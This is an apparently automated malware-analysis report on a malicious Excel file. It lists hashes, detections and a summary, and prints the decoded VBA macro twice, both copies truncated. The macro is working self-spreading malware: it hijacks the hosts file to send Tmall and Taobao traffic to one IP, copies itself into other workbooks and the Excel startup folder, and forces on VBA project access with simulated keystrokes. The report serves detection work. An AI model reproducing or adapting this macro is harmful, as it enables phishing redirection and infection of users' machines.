Office (OLE) malware analysis — malicious · 4d8eaeead00929d8

MALICIOUS

Office (OLE)

33.5 KB Created: 2020-01-10 06:33:06 Authoring application: Microsoft Excel First seen: 2020-07-24

MD5: 5840400075dc451e34f44bef636fd856 SHA-1: 63c9577af361894c1794a8863e078065c013bf37 SHA-256: 4d8eaeead00929d83c9517e255fb5c63fca1b7625de6c288be00e87b68045752

120 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The VBA macro within this Excel file is designed to modify the system's hosts file. Specifically, it attempts to append entries that redirect 'www.tmall.com' and 'www.taobao.com' to the IP address 45.78.21.150. This technique is often used to redirect users to phishing or malware distribution sites. The Workbook_Open heuristic and ClamAV detection further support its malicious nature.

Heuristics 3

ClamAV: Xls.Malware.Xanpei-9448553-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Xanpei-9448553-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5842 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5842 bytes
SHA-256: `7874e51af2a2238084c6fc777206f8f9a31a3430c13e0dc7b6ca9d6dd452ba9c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Declare PtrSafe Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Private WithEvents App As Application Attribute App.VB_VarHelpID = -1 Sub OfficeCheck() Dim SysParh As String, Sysadd As String, t As String, sysadd1 As String SysParh = Space(256) GetSystemDirectory SysParh, 256 SysParh = Trim(SysParh) SysParh = Left(SysParh, Len(SysParh) - 1) SysParh = SysParh & "C:\Windows\System32\drivers\etc\hosts" Sysadd = "45.78.21.150 www.tmall.com" sysadd1 = "#45.78.21.150 www.tmall.com" If InStr(t, Sysadd) <> 0 Then Open SysParh For Input As #1 t = Input(LOF(1), #1) Close #1 If InStr(t, Sysadd) <> 0 Then Open SysParh For Output As #1 t = Replace(t, sysadd1, Sysadd) t = Replace(t, "#45.78.21.150 www.taobao.com", "45.78.21.150 www.taobao.com") Print #1, t Close #1 End If If InStr(t, Sysadd) = 0 Then Open SysParh For Append As #1 Print #1, vbNewLine & Sysadd & vbNewLine & "45.78.21.150 www.taobao.com" Close #1 End If End If End Sub Sub runtimer() Application.OnTime Now + TimeValue("00:00:05"), "thisworkbook.p2d" End Sub Private Sub p2d() On Error Resume Next Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook") If Err.Number = 1004 Then Err.Clear Application.SendKeys "%(qtmstv){ENTER}" DoEvents End If Dim WBstr$, Wb As Workbook With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule For i = 1 To 105 '.CountOfLines WBstr = WBstr & .Lines(i, 1) & Chr(10) Next End With If ActiveWorkbook.FileFormat = 52 Or ActiveWorkbook.FileFormat = 56 Then If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call d2p" ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub" End If End If End Sub Private Sub d2p() Dim pth As String Dim Exl As Excel.Application Dim WBstr$, fn$, Wb As Workbook Dim ws As Worksheet On Error Resume Next Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook") If Err.Number = 1004 Then Err.Clear Application.SendKeys "%(qtmstv){ENTER}" DoEvents End If pth = Application.StartupPath & "\accelerate.xls" If Dir(pth) = "" Then Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook") If Err.Number <> 1004 Then Workbooks.Add.SaveAs Filename:=pth, FileFormat:=18 Else Workbooks.Close End If Else Exit Sub End If Set Wb = Workbooks.Open(pth) With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule For i = 1 To 105 '.CountOfLines WBstr = WBstr & .Lines(i, 1) & Chr(10) Next End With If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()" ActiveWorkbook.VBProject.VBComponents("This ... (truncated)

SHA-256: 7874e51af2a2238084c6fc777206f8f9a31a3430c13e0dc7b6ca9d6dd452ba9c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare PtrSafe Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private WithEvents App As Application
Attribute App.VB_VarHelpID = -1
Sub OfficeCheck()
Dim SysParh As String, Sysadd As String, t As String, sysadd1 As String
SysParh = Space(256)
GetSystemDirectory SysParh, 256
SysParh = Trim(SysParh)
SysParh = Left(SysParh, Len(SysParh) - 1)
SysParh = SysParh & "C:\Windows\System32\drivers\etc\hosts"
Sysadd = "45.78.21.150 www.tmall.com"
sysadd1 = "#45.78.21.150 www.tmall.com"
If InStr(t, Sysadd) <> 0 Then
Open SysParh For Input As #1
t = Input(LOF(1), #1)
Close #1
If InStr(t, Sysadd) <> 0 Then
Open SysParh For Output As #1
t = Replace(t, sysadd1, Sysadd)
t = Replace(t, "#45.78.21.150 www.taobao.com", "45.78.21.150 www.taobao.com")
Print #1, t
Close #1
End If
If InStr(t, Sysadd) = 0 Then
Open SysParh For Append As #1
Print #1, vbNewLine & Sysadd & vbNewLine & "45.78.21.150 www.taobao.com"
Close #1
End If
End If
End Sub
Sub runtimer()
Application.OnTime Now + TimeValue("00:00:05"), "thisworkbook.p2d"
End Sub
Private Sub p2d()
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
   Dim WBstr$, Wb As Workbook
    With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.FileFormat = 52 Or ActiveWorkbook.FileFormat = 56 Then
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 151, "Set App = Application"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 152, "End Sub"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 153, "Private Sub App_WorkbookOpen(ByVal Wb As Workbook)"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 154, "Call OfficeCheck"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 155, "Call d2p"
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 156, "End Sub"
    End If
    End If
End Sub
Private Sub d2p()
Dim pth As String
Dim Exl As Excel.Application
Dim WBstr$, fn$, Wb As Workbook
Dim ws As Worksheet
On Error Resume Next
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number = 1004 Then
Err.Clear
Application.SendKeys "%(qtmstv){ENTER}"
DoEvents
End If
pth = Application.StartupPath & "\accelerate.xls"
If Dir(pth) = "" Then
Debug.Print ThisWorkbook.VBProject.VBComponents("ThisWorkbook")
If Err.Number <> 1004 Then
    Workbooks.Add.SaveAs Filename:=pth, FileFormat:=18
Else
    Workbooks.Close
End If
Else
    Exit Sub
End If
    Set Wb = Workbooks.Open(pth)
        With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
        For i = 1 To 105 '.CountOfLines
            WBstr = WBstr & .Lines(i, 1) & Chr(10)
        Next
    End With
    If ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.CountOfLines = 0 Then
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 2, WBstr
    ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 150, "Sub Workbook_Open()"
    ActiveWorkbook.VBProject.VBComponents("This
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.